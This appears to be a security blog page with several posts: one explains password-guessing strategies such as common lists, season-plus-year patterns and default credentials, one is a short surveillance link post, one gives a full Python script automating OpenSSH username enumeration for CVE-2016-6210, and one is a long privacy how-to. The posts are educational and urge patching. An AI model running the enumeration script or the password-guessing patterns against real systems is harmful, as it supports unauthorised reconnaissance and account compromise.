General, Security, Privacy, Technical

A Hacker’s View of Passwords

Passwords You Say?

Passwords. The bastion of authentication. Defenders of data. Bane of those shadowy figures wearing hoods and ski masks in darkened basements whilst attacking your servers. Passwords protect your secrets, but how effective are they really?

Plenty of articles have been written on the short-comings of passwords — mainly around complexity, reuse, expiry, and how these additional “controls” may not truly solve the problems inherent to passwords. I will touch on these, but in the spirit of education I felt a duty to provide context and to answer the inevitable question one hears when they enact some new policy or control in the security world: “Why?”

I will start by saying that, in my humble opinion, passwords are here to stay — in one form or another. “What about biometrics?” you may ask — to which I will reply with another question: “What happens when your fingerprint is stolen?”. You can easily change a password. You can’t (easily) change your fingerprints. What about the tokens used in two-factor authentication? Couldn’t we simply just use those instead? Yes we could, but they can be lost or stolen, and can be expensive relative to a password. Economically speaking, we would have to see executives, as a whole, start taking security a lot more seriously if that is to happen.

So, for now, let us say that passwords will be with us for the foreseeable future. Maybe I’m wrong and some new technology will supplant passwords as the de facto standard — but for now they are here and we have to deal with them.

Now, Let us take a look at the current “state of the art” of passwords.

 

Passwords Currently

Password policy varies from organization to organization, but in general they seem to follow the lines of NIST SP-800 53’s example. Don’t know what NIST SP-800-53 is? Not to worry, it’s the US Federal Government’s catalogue of controls for “information systems” (aka: software systems, etc.).

In other words, it’s a list of things you need to do security-wise if you want to play ball with the US Feds. It’s good practice to do much of this if you are in the private industry as it’s a crazy world out there with crazy-hooded-masked-basement-dwellers around every corner.

So what does NIST SP… bla bla bla … say? It’s quite simple actually. It wants your passwords to:

  • Have a mix of upper-case letters, lower-case letters, numbers, and/or special characters (symbols and such) (Usually 3 of the 4)
  • Have a minimum password length (Usually 8+)
  • Not be the same as your last password (Some say “can’t be one of your last 10 passwords” or so)
  • Expire after some period of time (Usually 60 or 90 days)

Sound familiar?

NOTE: There are a few other requirements, but they don’t directly relate to password complexity so I’m leaving them out. If you really want to check it out, here’s the NIST SP 800-53 standard (pdf). It’s on page 253.

So what passwords fit this criteria?

  • Password123
  • Test1234
  • 12345678ABC!

Why is this important? Because adding complexity makes it hard to guess — in a way. What it actually does is make it hard to do what is called “brute-force”. That simply means to check every possible combination of values.

Time for some math. I promise it won’t be too much.
Let’s look at our criteria again:

  • Upper, lower, number, symbol
    • There are 26 upper-case letters (English alphabet)
    • There are 26 lower-case letters (English)
    • 10 numbers (0, 1, 2, 3 ,4, 5, 6, 7, 8, 9)
    • 16 symbols (~!@#$%^&*()_+,.?) (Yes I know there can be more but I had to choose)
    • TOTAL = 26 + 26 + 10 + 16 = 78 possible “characters” for each position in the password
  • Minimum password length
    • Assume this is 8 (can be longer, set by policy)
  • Not the same as your last password(s)
    • Doesn’t affect complexity
  • Expires after 60 or 90 days
    • Will affect how long we have to crack the code!

With all this, we can calculate how many possibilities there are in this 8-character password:

78 x 78 x 78 x 78 x 78 x 78 x 78 x 78 = 78^8 = 1,370,114,370,683,136 possible passwords

That’s a lot! Even with some decent-powered computers this would take a long time to go through. But a hacker is smarter than that. They know that it’s not worth trying every combination — especially on a live system where an increase in traffic might get noticed.

So they think about how people choose their passwords instead.

 

A Hacker’s Approach to Passwords

Hackers aren’t going to brute-force the passwords. There are just too many possibilities. They are going to use their brains. They’re going to think about how you choose your passwords. They see the standards too! They know you have to change them. They know the complexity requirements. But they also know that it is hard to remember lots of passwords. They take advantage of this by:

  • Looking at “Common Password Lists” that are occasionally published
  • Looking at common themes:
    • 60-90 day password changes are around the time of Fall, Winter, Summer, and Spring
    • Fun Fact: ‘Fall’, ‘Winter’, ‘Spring’, and ‘Summer’ come up in passwords
  • Use of a year range — usually at the end of a word. For example: Winter2018
    • Or, if they know it, your birth year or date in different formats
  • Common substitutions of numbers for letters. For example: W1nter2018
  • General words with numbers at the end. For example: Test1234
  • Noticing that most passwords start with a capital letter and end with one or more numbers
  • Noticing that people use the same or similar passwords for other accounts
    • If another account get hacked, they will look for published password dumps and try those

These are a lot of rules, but let’s take a look at just the “common password list” one.

If the list has 100,000 of the most used passwords, the hacker is expecting to have decent luck and will only have to try 100,000 times per user. That’s far better than the 1,370,114,370,683,136 possible passwords per user we calculated earlier.

Sadly, in many cases this is as far as the hacker has to go to get into a system. Common passwords are published as “common” for a reason. They are out there in numbers.

Let’s take a look at another few rules.

“Starts with a capital, ends with a number” (Ex: Testing1)

The hacker can brute-force using this rule to reduce the possibilities, but brute-forcing will always be their slowest option. They are more likely to use a pre-existing dictionary of words and apply this rule to those words. For example, let’s say that the hacker obtained a dictionary of the top 100,000 words in the English language that are 7 characters or more in length. Then they apply their rule to it:

“abashed” becomes Abashed1, Abashed2, Abashed3, Abashed4, Abashed5, Abashed6, Abashed7, Abashed8, Abashed9, Abashed0 and so on.

We add 10 words for every one word in the dictionary since we are adding a number to the end. If there are 100,000 words in the dictionary, this rule will have 1,000,000 possibilities.

This is a very effective method to guess passwords when a hacker has no other information to go by.

Seasons or Trends

Similar to the “dictionary” method above, except our list of words consist of only Winter, Fall, Summer, and Spring (Or some other noticed trend). The hacker may try a variety of date ranges on the end to try and find old passwords too. For example:

Winter2015, Winter2016, Winter2017, Winter2018, Winter2019

This is quick and dirty, but sometimes works. This is an attack that may even be done manually (no scripts or automation). If a hacker sees a username and password portal, they may try these out (along with username:password combinations such as admin:admin, admin:<blank>, root:admin, etc.)

Fun fact: After the Equifax breach it was found that one of their servers had the admin:admin username and password combo. It works because it is still used. Hackers know.

NOTE: Hackers will also think about who they think you are. If your email is usmarine@marinemail.com, they might just passively try semperfi as the password (US Marine’s motto). Or batman. For some reason the password batman is always in password dumps. Odd. Or awesome. Not awesome. Choose better passwords.

Ultimately, the hacker is going to try and think of ways that people try and remember passwords — because those methods also make it easier to guess. So if the only good password is one that is hard to guess and it seems that our techniques to remember them are making things worse, what do we do?

I’m glad you asked.

 

How Can We Make Better Passwords

Password Managers

The examples above are guessable because they aren’t random. If you had a truly random password there would be no patterns and it would be hard to guess. The problem with this is that it would also be hard to remember. Enter the password manager.

The password manager … wait for it … manages passwords! Now you only have to remember one strong password and it will deal with the rest — better yet, add two-factor authentication for that added kick. +1 to awesome!

In addition to storing and managing your passwords securely, some password managers also give you the ability to auto-generate strong random passwords for you, enter them when needed, and update them when your password expires. Very nice indeed!

Don’t Use Predictable Patterns

If you can’t (or don’t want to) go down the password manager route, you can always just up your password-making game, but know this:

  • Common substitutions are almost as easy to guess as if they were just the normal character/letter
  • Don’t follow a predictable pattern such as a single word that starts with a capital letter, then followed by some numbers. You’re better than that.
  • Never use the seasons as part of your password — They are one of the first few passwords guessed
  • Know what the top passwords used are (they get published from password breaches) and make sure your passwords don’t follow any of those patterns
  • If your password expires, don’t make the new password the same as your old password just with a capital or number or other slight change
  • Where possible, use two-factor authentication (AKA: 2FA)

NOTE: Adding 2-factor authentication is good, but the solutions aren’t all equal: Getting a text is the weakest 2-factor authentication you can have. It is better than nothing, but not by much. You can buy a physical token but this has an added cost. It’s ultimately about economics… and how tinfoil-hatty you are.

Passphrases

There has been some discussion that points towards passphrases as a way forward. A passphrase is an entire phrase (as in multiple words) as opposed to a simple password (which is a single word). A passphrase will be longer and include multiple words that make simple dictionary methods fail. They will also be easier to remember.

 

Conclusion

It is my hope that in this journey through the darkened minds of hooded deviants you are able to think a little like them when you choose your next password. Don the tinfoil hat with pride. And know that your data is just a little bit safer because of it.

 

Standard
General, Security, Privacy

History and its Uncanny Ability to Repeat Itself

The EFF has published a well-cited and informed article on why they view the current trend of dragnet surveillance to be thoroughly against the constitution of the U.S.

Even if you are not an American, this article touches on the ideals of many. It describes the context around why the Fourth Amendment was included and goes into specific detail as to who and why they thought it so important:

“Using ‘writs of assistance,’ the King authorized his agents to carry out wide ranging searches to anyone, anywhere, and anytime regardless of whether they were suspected of a crime. These ‘hated writs’ spurred colonists toward revolution and directly motivated James Madison’s crafting of the Fourth Amendment.”

I highly recommend reading the entire article: The NSA’s “General Warrants”: How the Founding Fathers Fought an 18th Century Version of the President’s Illegal Domestic Spying

 

Standard
Programming, Security, Privacy, Technical

A Look At Using Discovered Exploits

There are usually two general steps for a software exploit to be created.

The first step is the vulnerability discovery. This is the hardest of the two steps. It requires in-depth knowledge about the target software, device, or protocol and a creative mind that is tuned to edge cases and exceptions.

The second step is the exploitation of the discovered vulnerability. This requires the developer to take the vulnerability description and write a module or script that takes advantage of it.

This article will address the second step: Exploit creation.

First, where do we find vulnerabilities for software if we do not discover them ourselves? There are online databases that store published vulnerabilities (and may include example code) in a searchable format. A few are CVE, exploit-db, or the NVD.

Looking through these databases we will see that all published vulnerabilities have a unique CVE identifier. They uniquely identify each vulnerability that has been discovered and confirmed. Using the databases we can search for potential vulnerabilities of a particular target (Note: This is similar to what a bot might try, after it has scanned a new target server, to find any published vulnerabilities).

Some vulnerability descriptions may even sample code — such as CVE-2016-6210. This makes it trivial to write a script that may utilize this vulnerability. For example, we could use the code given to us in CVE-2016-6210 and expand it to make a command-line script that takes a list of known usernames and tries each one… Which is the vulnerability the CVE describes: “SSH Username Enumeration Vulnerability”.

This script will not breach the system, but what it will do is try to find valid usernames via SSH. This vulnerability may lead to, or become part of, a larger attack. It is important to patch all discovered vulnerabilities as you don’t know how an adversary will try to attack your system.

Given the sample code, here is our improved version:


import paramiko
import time
import argparse
import logging

logging.basicConfig()

class Engine(object):
    file_path = None
    target = ''
    userlist = ['root']
    calc_times = []

    req_time = 0.0
    num_pools = 10

    def __init__(self, target, filepath=None, req_time=0.0):
        self.req_time = req_time
        self.target = target
        self.file_path = filepath
        if self.file_path:
            self.load_users(filepath)

    def load_users(self, filepath):
        data = []
        with open(filepath, 'r') as f:
        data = f.read().splitlines()
        self.userlist = data

    def partition_list(self, p_list):
        p_size = len(p_list) / self.num_pools
        for i in xrange(0, len(p_list), p_size):
            yield p_list[i:i+p_size]

    def execute(self):
        for user in self.userlist:
            self.test_with_user(user)

    def test_with_user(self, user):
        p = 'A' * 25000
        ssh = paramiko.SSHClient()
        start_time = time.clock()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        end_time = time.clock()
        try:
            ssh.connect(self.target, username=user, password=p)
        except:
            end_time = time.clock()
        total = end_time - start_time
        self.calc_times.append(total)
        avg = reduce(lambda x, y: x + y, self.calc_times) / len(self.calc_times)
        flag = '*' if total &amp;amp;gt; avg else ''
        print('%s:\t\t%s\t%s' % (user, total, flag))
        time.sleep(self.req_time)
        ssh.close()

def main(ip_addr, filename=None, req_time=0.0):
    if ip_addr == '' or not ip_addr:
        print('No target IP specified')
        return
    if filename == '':
        filepname = None
    engine = Engine(target=ip_addr, filepath=filename, req_time=req_time)
    engine.execute()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Simple automated script for CVE 2016-6210 -- OpenSSHD 7.2p2 &amp;amp;gt;= version')
    parser.add_argument('ip', help='[Required] The IP of the target server')
    parser.add_argument('-u', '--userlist', help='Specify a filepath with a list of usernames to try -- one username per line')
    parser.add_argument('-t', '--time', help='Set the time between requests (in seconds)')
    ip_addr = None
    filename = None
    req_time = 0.0
    args = parser.parse_args()

    if args.ip:
        ip_addr = args.ip
    if args.userlist:
        filename = args.userlist
    if args.time:
        req_time = float(args.time)
    main(ip_addr, filename, req_time)

 

It is much easier to write exploits for already-discovered vulnerabilities than it is to discover them yourself.

This is why it is vital that system admins keep their servers and software up to date.

 

 

 

Standard
General, Technical

Privacy: A How-To

Introduction

With the leak of classified NSA documents and their entailing revelations, Edward Snowden has become a household name. He single-handedly caused millions of people to rethink their electronic lives – and their assumptions of privacy. Now, those people (and businesses) are scrambling to find solutions to a problem they didn’t know existed, or chose to remain blissfully unaware, a number of months ago.

There have been numerous blog posts and documents about enhancing your systems to increase privacy protection, and I thought that I would summarize many of them from the perspective of someone who works in the industry. The sections of this article are organized in order of complexity (and tinfoil hattiness). The easiest and most basic measures will be in section 1 while the most complex and restrictive measures will be in the last.

Before we begin, it is important to talk a bit about expected threats and mitigations. Mitigations are simply the measures you take to deal with a threat satisfactorily – Hopefully completely, but not always. A threat is anything that is considered an opponent to your security and privacy in this case. It is important to figure out what kind of threat you are dealing with and take the appropriate actions to mitigate it.

For example, mitigations that stop basic malware and bots from getting your information may not be as effective against, say, a skilled and motivated attacker – such as an NSA operative, or hacker, or cleverly-designed system.

It is unlikely, honestly, if they really wanted your information, that you could mitigate the NSA threat. The NSA is an enormous government agency that is well-funded and extremely motivated. They employ intelligent and educated people who do this for a living. The goal is to raise the difficulty in tracking you just enough to exceed the minimum effort level that their automated systems will take for granted. Automated systems include bots and malware, along with other classified technologies, that gather information automatically – with no human in the loop. These threats we can mitigate.

Now that we have that out of the way, let’s dive in.

[Disclaimer]: These suggestions are a combination of sources (listed at the end) and my own. As such, this information is not fully my original content and I did not create it. I am simply listing it here for your convenience. Sources are cited as to the origin of suggestions.

Section 1: Basic Measures

Tin Foil Hat Level: “I read an article once about privacy and it scared me. I need a list of things I may, or may not, do.”

Threats: Basic email scams, scraping bots, potential job prospects, your mom

Be careful about what websites you go to and what you download. This includes e-mails and popups. If you don’t know it don’t click it. Also, don’t post anything that you wouldn’t want exposed. There is an old saying: “Once it’s on the internet, it’s forever”. This includes social media websites. Even if their terms of use say that they won’t use it, what is to stop them from changing it later on?

Don’t post identifying information if you don’t have to. In fact, don’t provide any information that isn’t needed. So you want to sign up for a music website? Why do they require you to include your mother’s maiden name, age, location, phone number, and birthdate? This includes mobile apps!

Google yourself. See what comes up. Try Bing or other search engines. If something comes up that you don’t like, try to take it offline and add new content with the same keywords that you used to find the offending item. It takes time. There are professionals that do this.

And lastly, don’t share passwords and account information with anyone!

No, that prince from Nigeria doesn’t need your account info to deposit millions of cash. No, you won’t win a free trip to Hawaii if you click that link that goes to http://www.haha_i_got_you.com. No, you shouldn’t look at that attachment from a person you’ve never heard of before – from an email address you’ve never seen before. If the deal looks too good to be true, it almost always is. Sorry.

Now that wasn’t too hard! This works decently if your information isn’t on the internet already. Unfortunately, if you want to protect any information that is already online, this may not help.

Section 2: Novice Measures

Tin Foil Hat Level: “I read this article about privacy and the NSA and I need some help to protect my information! …Only if it’s not too intrusive though.”

Threats: most bots, scams, most malware, viruses, basic hacking attempts, account username/password attacks

OK, so you are already doing the basic measures but still don’t feel safe. Fair enough. There are lots of threats out there that can easily get past those mitigations if your information is already online. Let’s take it to the next level.

If you haven’t already, install antivirus software, malware protection, and cleaning tools.

For Windows, I use Spybot Search and Destroy 1.6.2 (or Malwarebytes), CCleaner, and Windows Security Essentials (or Windows Defender). Spybot does not prevent malware from getting on your computer, it simply removes it once it is on there. CCleaner cleans up your temporary files including cookies, etc. MS Security Essentials is an integrated system that “guards against viruses, spyware, and other malicious software. It provides real-time protection for your home or small business PCs”. Really, any antivirus software will be good, but you can look at reviews to see which one best suits your type of usage.

The key here is to layer. Defense in depth. MS Security Essentials may not get everything so you need Spybot or some other mitigation.

Update often. Honestly, you should be doing this already. This is a security tip, but security and privacy are inherently linked as preventing a breach in one helps prevent breaches in the other. This includes (for Windows) Windows Update and any software that you have installed (Java, Flash, browsers, etc).

Make sure you have a firewall. Windows has one built in. At least use that one.

Create strong passwords. Yeah the website asks for minimum 8 characters, but really, computers are wicked-fast. Brute-forcing passwords is getting easier. And there’s no reason not to make stronger passwords including longer strings of characters, numbers, capitals, etc. Also, stop using the same password for all of your accounts. If someone hacks one account, they get the keys to all accounts. Bad news.

Configure your browsers to delete history and cookies on close. This prevents a lot of cookies from hanging around after you’re done with them for no reason.While you’re at it, take a look at the security and privacy settings in your browser. Make sure that things are not being tracked and that add-ons can’t be installed without your consent.

Install a well-reputed security app on your smartphone. Malware for mobile devices is on the rise and you don’t want to get caught up in it.

Try to use HTTPS as much as possible (will show https://www.google.com instead of http://www.google.com), and learn what a certificate is, what it is used for in HTTPS, and why it is important. Avoid accepting less-than-reputable certificates.

Start reducing the amount of information you provide to social media sites such as Facebook, Twitter, Pintrest, Google Plus, etc. Does that information really need to be on there? Here’s a question, why is Facebook worth so much if it provides a free service? How about, why does Google give you so much for free (e-mail, documents, social media, etc) without charging anything? Fun fact: Google is an advertising company. A note about Google: “You are not their customer, you are their product”.

Section 3: Intermediate Measures

Tin Foil Hat Level: “The NSA is out there and I need to protect myself!”

Threats: bots, scams, malware, viruses, hacking attempts, account username/password attacks, XSS, Session Hijacking

Start installing browser add-ons!

Install “HTTPS Everywhere”, which forces HTTPS sessions with all websites that you go to. What does this do? HTTPS is the protocol for secure communication over the internet. HTTPS ensures that attackers can’t listen in on your communicaitions over the internet.

Install NoScript to your browser. NoScript will default-deny all scripts from running until you allow them. This can be very annoying at first, but once you have allowed the “elements” from the sites that you usually go to, it’s not that bad – Just make sure to check the icon if a movie isn’t playing or a page doesn’t load correctly. Also, you get to see what, exactly, is run behind the scenes on all of your favourite websites!

Install “AdBlock Plus” to your browser. This – you guessed it – blocks ads. Ads can be the vehicle that delivers malware. Don’t let them near you.

Install “Self-Destructing Cookies” to your browser. This add-on removes cookies as soon as they are not required.

Install the “Disconnect” add-on to your browser and to your phone. “Disconnect lets you visualize & block the invisible websites that track you”.

Install the “Better Privacy” add-on to your browser. “Remove or manage a new and uncommon kind of cookies, better known as LSO’s. The BetterPrivacy safeguard offers various ways to handle Flash-cookies set by Google, YouTube, Ebay and others…”

Your web browser is the window to the internet. It can be a benefit as well as a curse. These add-ons mitigate much of that “curse” aspect.

Section 4: Advanced and Restrictive Measures

Tin Foil Hat Level: “The NSA is just the tip of the iceburg, man! They’re watching everything! Nobody’s safe!!!”. Also, people complement you on the size of your tinfoil hat. You are the tinfoil-hattiest!

bots, scams, malware, viruses, hacking attempts, account username/password attacks, XSS, session hijacking, motivated attackers, attackers who may be able to gain physical access to your computer

These measures will require technical skills, and they will restrict what you can do online significantly, but they will provide the best defense of your privacy in comparison to the previous measures suggested.

The Phone:

Install ‘Replicant’ or ‘CyanogenMod’ on your phone. These are replacement operating systems for your phone. They will give you far better control of what information is sent to ‘the outside’.

Install SecDroid (for Android). This app controls what apps can use the internet.

Use F-Droid instead of the Google Play Store. The goal is to avoid Google products.

Look into making a custom case/”glove” for your phone that blocks out electronic signals (http://killyourphone.com/)

Use Chromium (Open-source browser – is not Google Chrome), or Mozilla Firefox – with the add-ons suggested above.

The Computer:

Ditch Windows and Mac altogether. Go Linux: Ubuntu (a linux operating system) is a great alternative. There may be a bit of a learning curve, but it is not as bad as you may think! There are plenty of distributions of linux to suit your needs.

Encrypt your hard drive. Look into TrueCrypt or other similar tools. Encryption ensures that, even if they get your physical computer, the attacker can not access your files without your password.

Look into using VPNs (Virtual Private Networks) such as those provided by “Private Internet Access” (PIA), and see if they are right for you.

Look into “The Onion Router” (TOR). See if it is right for you.

Use Chromium (Open-source browser – is not Google Chrome), or Mozilla Firefox – with the add-ons suggested above.

Wrapping It Up

Many of these suggestions are extreme, and the list is far from complete. These are simply a great place to start no matter the size of you tinfoil hat.

I won’t judge.

Sources

Helpful hints about privacy from Microsoft: http://www.microsoft.com/security/online-privacy/prevent.aspx

What is information and internet privacy?: https://en.wikipedia.org/wiki/Information_privacy
and: https://en.wikipedia.org/wiki/Internet_privacy

Microsoft Security Essentials: http://windows.microsoft.com/en-CA/windows/security-essentials-download

Detailed discussion about advanced mitigations for privacy: http://www.reddit.com/r/privacy/comments/1x5c2r/rebuilding_my_privacy_from_the_ground_up_looking/

“HTTPS Everywhere” browser addon: https://www.eff.org/https-everywhere

Replicant: http://www.replicant.us/
and: https://en.wikipedia.org/wiki/Replicant_%28operating_system%29

CyanogenMod: http://www.cyanogenmod.org/

Ubuntu: http://www.ubuntu.com/

TrueCrypt: http://www.truecrypt.org/

Private Internet Access: https://www.privateinternetaccess.com/

SecDroid: https://play.google.com/store/apps/details?id=com.shadcat.secdroid&hl=en

F-Droid: https://f-droid.org/

The Onion Router (TOR): https://www.torproject.org/
and: https://www.torproject.org/projects/torbrowser.html.en

Thunderbird: https://www.mozilla.org/en-US/thunderbird/

Autistici: http://www.autistici.org/en/index.html

Standard